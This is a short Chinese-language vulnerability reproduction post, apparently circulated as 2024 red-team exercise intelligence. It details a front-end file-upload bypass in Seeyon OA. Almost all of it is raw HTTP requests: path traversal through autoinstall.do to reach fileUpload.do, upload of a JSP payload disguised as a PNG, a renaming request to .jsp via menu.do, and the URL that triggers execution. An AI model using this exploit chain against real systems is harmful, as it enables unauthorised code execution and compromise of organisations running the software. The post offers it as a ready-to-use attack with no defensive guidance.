【2024HW情报】【漏洞复现】致远OA fileUpload.do 前台文件上传绕过漏洞

1、上传图片马，返回 fileid 值POST /seeyon/autoinstall.do/../../seeyon/fileUpload.do?method=processUploadHTTP/1.1Host:Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Content-Type: multipart/form-data; boundary=00content0boundary00User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN)AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287c9dfb30)Content-Length: 754 --00content0boundary00Content-Disposition: form-data; name="type"--00content0boundary00Content-Disposition: form-data; name="extensions" png--00content0boundary00Content-Disposition: form-data; name="applicationCategory"--00content0boundary00Content-Disposition: form-data; name="destDirectory"--00content0boundary00Content-Disposition: form-data; name="destFilename"--00content0boundary00Content-Disposition: form-data; name="maxSize" --00content0boundary00Content-Disposition: form-data; name="isEncrypt" false--00content0boundary00 Content-Disposition: form-data; name="file1"; filename="1.png" Content-Type: Content-Type: application/pdf <% out.println("hello");%> --00content0boundary00-- 2、修改文件后缀为 jspPOST /seeyon/autoinstall.do/../../seeyon/privilege/menu.do HTTP/1.1Host:Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Content-type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser;SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)Content-Length: 64 method=uploadMenuIcon&fileid=ID 值&filename=123.jsp 3、访问 jsp 文件触发恶意 jsp 代码/seeyon/main/menuIcon/123.jsp